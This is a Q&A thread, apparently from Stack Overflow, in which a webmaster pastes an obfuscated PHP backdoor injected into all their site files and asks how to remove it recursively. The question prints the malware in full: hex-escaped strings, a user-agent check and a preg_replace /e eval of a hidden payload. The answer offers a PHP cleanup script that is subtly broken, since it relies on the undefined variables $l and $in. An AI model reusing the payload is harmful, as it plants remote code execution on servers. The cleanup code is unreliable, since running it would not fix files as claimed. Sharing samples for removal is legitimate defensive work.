# Replace long string of text using php recursively in a directory

Tags: php, python

All the .php files on my webserver got infected with a bad line of code after a malware injection attack.

My question is about how I get rid of this one line of code from all my files. The bad code is below.

Also, I cannot just remove the entire line because there is other code after this code ends on the same line.

Either Python (my server only supports 3.2.3) or PHP would be fine.

```
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $leyjxkhvsg = '22!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%5f%163%x74%141%x72%164")2%162%x61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%x67%42%x2s%x5c%x785csboe))1%x5c%x782f35.)14]y76]61]y33]68]y34]%x78256<pd%x5c%x7825w6Z6<.5c%x7825))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssbr#%x5c%x785cq%x5c%x78257%x5c%x782f7#@#7%x5825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!hx5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5cvg}k~~9{d%x5c%x7825:osvufs:~928>>%x5c%x78c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%x787fbE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gx787f;!|!}{;)gj}l;33bq}k;opjud)ufttj%x5c%x7822)gj6<^#Y#%x5c%x75c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyfmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bu2#-#!#-%x5c%x7825tmw)%x5c%x7829]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c%x7825_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*d[k2%x5c%x7860{6:!}7;!}6]y7d]252]y74]256#<!%x5c%x7825ggg)(56%x75%156%x61"]=1; c%x785c1^W%x5c%x7825c!>!%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)2qj%x5c%x7825)7gj6<**2qj%x5c%x7825)h%x7860439275ttfsqnpdov{h19275j{hnpd19275fubmgovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x78#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]<#%x5c%x782f%x5c%x7825c%x782fq%x5c%x7825>2q%x5c%x7825<#4]6]234]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bs-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%5%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x-!%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x525!<*qp%x5c%x7825-*.%c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]8z-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825hIr%x5c%x785c1^-%x%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%t%x5c%x7825)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}5y85]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%775]y83]248]y83]256]y81]265]y7if((function_exists("%x6f%142%xXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x78227error_reporting(0); preg_replace("c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x76g]257]y86]267]y74]275]yx7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825827&6<.fmjgA%x5c%x7827doj%x5c%x760ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)}.;%x5c%x7825!-#2#%x5c%x782f!osvufs}w;*%x5c%x787f!>>%x5c%x785tww**WYsboepn)%x5c%x7825bss-%x5c%x7%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x825<#462]47y]252]18y]#>q%x5c]y7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#]y84]2x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)3238256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7885cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|u%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x7c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1<!fmtf!*id%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfsx61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141%x727}88:}334}472%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x25c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)%x5A%x5c%x78272qj%x5c%x78256<^#zsfv61%156%x75%156%x61"])))) { $GLOBALS["%x61%1860%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782]Y%x5c%x78257;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%xr%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<*%x5c%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%%x7860hA%x5c%x7827pd%x5c%x78256<C%x;##}C;!>>!}W;utpi}Y;tuofuopd%*[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x78*#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782<**qp%x5c%x7825!-uyfu%x55c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5x5c%x7860bj+upcotn+qs%x7825):fmji%x5c%x7878:<##:>:h%x5c%x7825:<#64y]c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c:55946-tr.984:75983:48984:71]Kww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c3", NULL); }x7878r.985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y3>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%c%x782f7^#iubq#%x5c%x785ce]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787f%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&6|7**111127-K)ebfsX%x57:]268]y7f#<!%x5c%x7825tww!>%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%x7825)!gj!|!68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]25-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%xg2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%22:ftmbg39*56A:>:8:|:7#6#)tutjyf%x5c25hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D63%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5cx782f%x5c%x7824)#P#-#Q#-#B#-#T#-of.)fepdof.%x5c%x782f#@#%x5c%x782fqp%%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!R17,67R37,#%x5c%x782fq%x5c%x7825>w6<*K)ftpmdXA6|7**197-2qj%x5c%x7c%163%x74%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%x5c%x787fw6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#oj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825x7825)sf%x5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x#]y76]277]y72]265]y39]274]y85]273]y6g]273]y76]271e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x7875c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%x7U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%71]y83]256]y78]248]y83]256]y81]265]y72]25824-%x5c%x7824tvctus)%x5c%x7825%x5c%x77825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*wx7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfsdc%x7825ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%x78e%%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x7)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ey74]273]y76]252]y85]256]y},;uqpuft%x5c%x7860msv1M6]y3e]81#%x5c%x782f#7eP6]36]73]83]238M7]381]211M5]67]452]88]5]48]827pd%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd%x5cc%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5U<#16,47R57,27R66,#%xx7822#)fepmqyfA>2b%x5c%x78x7825j:^<!%x5c%x7825w%x5c%x7860%x%x7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5c%x785c%x5c%x5c%x78b%x5c%x7825mm)|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|5c%x782f2986+7**^%x5c%x782f%x5c%x!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!x787f_*#ujojRk3%x5c%x7860{666~6<&w6<g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdoF.uofu5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x77825r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfwx5c%x7825>5h%x5c%x78f%x5c%x787f%x5c%x787f%x5c%x787f<u%x5c%xc%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!*uyfx7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x7824-tusqpt)%x5#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%xx5c%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x7*X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_%x7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x7860gvodujpo)##-!#~60{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<x78257-MSV,6<*)ujojR%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x5c%x7860ufh%x5c%x786**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepd6]258]y6g]273]y76]271]y7d]252]y74]256#x5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!*7825r%x5c%x7878<~!!%x5c%x7825s:N}#-5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x5c%x7860msvd825z>3<!fmtf!%x5c%x7825z>2<!%x5x782f%x5c%x7825kj:-!OVMM*<(<5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTQcOc%x5c%x782f#00-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%opm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825)fnbozcYufh}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb274]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5*1?hmg%x5c%x7825)!gj!<**2-4-function fjfgg($n){return chr(ord($n)-1);} @-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]27125!<*::::::-111112)eobs%x5c%%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osvufs:~:<*9-1-%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>32M3]317]445]212]445]43]321]464]284]36zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%j!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x7825!<**3-j%x5c%x7825d}+;!>!}%x5c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;2]254]y76#<%x5c%x7825tmw!>!#]y84]275]y83]273]y76]277#<%x5c%x7825t2w>#]x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y39]2824<!%x5c%x7825mm!>!#]y81]273]y7824*<!%x5c%x7824-%x5c%x7824gps)%fe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{8786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]oc%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudo!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%x782f14+9**-)1%xq%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvroj%x5c%x78257-C)fepmqnjA%x5c%x7opD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%0fmjg}[;ldpt%x5c%x7825}K;%x5c%x7882f*#npd%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<***f%x5c%x7281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%x7825bG9}:}.}-%165%x3a%146%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824%x2f%50%x2e%52%x29%57%x65","%x65%166%vmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5%x5c%x7825o:W%x5c%x78x5c%x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]c%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%7827,*b%x5c%x7827)fepdc%x7827u%x5c%x7825)7fmji%x5c%x7 && (!isset($GLOBALS["%x3g]61]y3f]63]y3:]68]y76#<%x5c%x78e%x5c%x78b%x5c%Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]5c%x7825kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]/(.*)/epreg_replacecrgdohsctb'; $ctvuikaisu = explode(chr((281-237)),'1983,31,44,24,9920,24,3161,43,1024,20,8115,44,2068,34,9605,37,2955,50,68,62,5119,59,9495,52,9944,48,6877,69,6092,64,183,26,4867,60,3451,35,738,60,4415,47,4319,68,9889,31,9004,58,3272,54,543,69,5087,32,4700,41,5785,55,2014,54,1112,36,7866,64,3129,32,268,42,4070,25,9204,45,5286,54,706,32,2619,44,4230,51,911,56,9249,31,2216,32,2574,45,7315,57,2901,54,1766,70,7372,62,6460,36,5178,64,967,23,3486,29,7434,21,9335,33,2248,48,7652,50,6003,22,8663,60,2319,32,0,44,9697,70,6585,59,6644,69,404,62,798,40,612,64,8602,61,8493,36,4462,57,8087,28,1275,70,4603,40,6350,37,9116,67,4996,58,4001,69,6220,26,1650,21,7082,66,9368,67,3026,38,9867,22,4959,37,6767,20,8307,28,2173,43,6420,40,7822,44,3703,21,9642,34,9815,52,5340,63,209,59,7201,51,1508,53,2527,47,8567,35,7557,60,7148,53,3641,24,6826,51,2772,61,3204,68,2663,52,9062,54,502,41,4741,36,1148,45,5242,44,7455,64,8943,61,5452,68,6787,39,5720,65,8452,41,5054,33,6199,21,1366,34,6496,51,9280,55,8793,44,5589,52,676,30,1193,47,4565,38,2296,23,8195,45,1456,52,5403,49,2461,66,1954,29,8723,70,5978,25,2149,24,4387,28,8397,55,3362,48,3580,61,2715,57,3823,45,3724,47,4643,57,2433,28,8335,62,1836,69,3005,21,8879,32,7519,38,9547,58,1610,40,2102,47,5682,38,6946,68,6156,43,3771,52,2387,46,6547,38,5520,69,8911,32,466,36,7252,63,1345,21,1561,49,10057,49,7965,65,8030,57,1044,26,7761,61,7014,68,6713,54,5931,47,1709,57,3665,38,1671,38,838,30,2351,36,310,39,4095,66,3945,56,6025,24,3868,30,868,43,4833,34,3326,36,9767,48,9992,65,9435,60,7930,35,3515,65,4777,56,4161,69,6049,43,8529,38,1400,56,130,33,9183,21,6387,33,7617,35,9676,21,3064,65,2833,68,349,55,6279,50,6246,33,1070,42,4281,38,3898,35,5896,35,7702,31,5840,56,6329,21,3410,41,4927,32,1240,35,8159,36,7733,28,8240,67,990,34,8837,42,5641,41,163,20,4519,46,1905,49,3933,12'); $cqensojxnj=substr($leyjxkhvsg,(64237-54131),(38-31)); if (!function_exists('tkbpjyadoi')) { function tkbpjyadoi($zizmnehenk, $ftlltuhgpg) { $mldxhxpypx = NULL; for($vzvtopjgec=0;$vzvtopjgec<(sizeof($zizmnehenk)/2);$vzvtopjgec++) { $mldxhxpypx .= substr($ftlltuhgpg, $zizmnehenk[($vzvtopjgec*2)],$zizmnehenk[($vzvtopjgec*2)+1]); } return $mldxhxpypx; };} $dpwwlulbeo="\x20\57\x2a\40\x73\165\x79\162\x64\151\x63\161\x70\157\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\62\x34\55\x38\67\x29\51\x2c\40\x63\150\x72\50\x28\64\x33\61\x2d\63\x33\71\x29\51\x2c\40\x74\153\x62\160\x6a\171\x61\144\x6f\151\x28\44\x63\164\x76\165\x69\153\x61\151\x73\165\x2c\44\x6c\145\x79\152\x78\153\x68\166\x73\147\x29\51\x29\73\x20\57\x2a\40\x6a\145\x6f\160\x74\153\x79\146\x76\157\x20\52\x2f\40"; $anprzirkfy=substr($leyjxkhvsg,(36319-26206),(48-36)); $anprzirkfy($cqensojxnj, $dpwwlulbeo, NULL); $anprzirkfy=$dpwwlulbeo; $anprzirkfy=(587-466); $leyjxkhvsg=$anprzirkfy-1; ?>
```

Comment: What makes you think we're here to do your work? What have you tried? Why didn't it work? What was the result? What was the expected result? If you aren't up to the task, I'd recommend hiring a professional.

Comment: Sorry I didn't put in all the information, I have tried a few things to get this code off, I already have it solved on my own... You shouldn't go assuming things. This site is so nasty towards newer coders and it is because of people like yourself.

Comment: No where in your post do you show what you've attempted to do to resolve the issue. All you've done is ask for code to achieve your desired result. At the very least, you're trying to get an expert in their field to do your work for you. That is the most disrespectful thing of all - the expectations. Please re-read the FAQ on asking a question, and [have a gander at this article](http://mattgemmell.com/what-have-you-tried/) so you can gain some clarity, and hopefully be more reserved in your accusations in the future.

Answer (score 0):

I did see this before and the first line of infected files was something like this:

```
<?php ...-- obfuscated code --..... ?><?php
```

Exploit would insert bunch of php right at first line before opening php tag.

If you want to fix it with php you could use something like this:

```
#!/usr/local/bin/php
<?php
$arr = file($argv[1]);
if (preg_match ('/^<\?php(.*)<\?php/', array_shift ($arr), $m)) {
  array_unshift ($arr,str_replace($m[0],'<?php',$l));
  file_put_contents($in,join ("",$arr));
}
```

If you save that in file fix.php, you could call it like

```
find /path/to/dir/with/php/files -name "*.php" -exec ./fix.php {} \;
```

Doing recursive files search in php would be little bit silly for this as find can do it easier.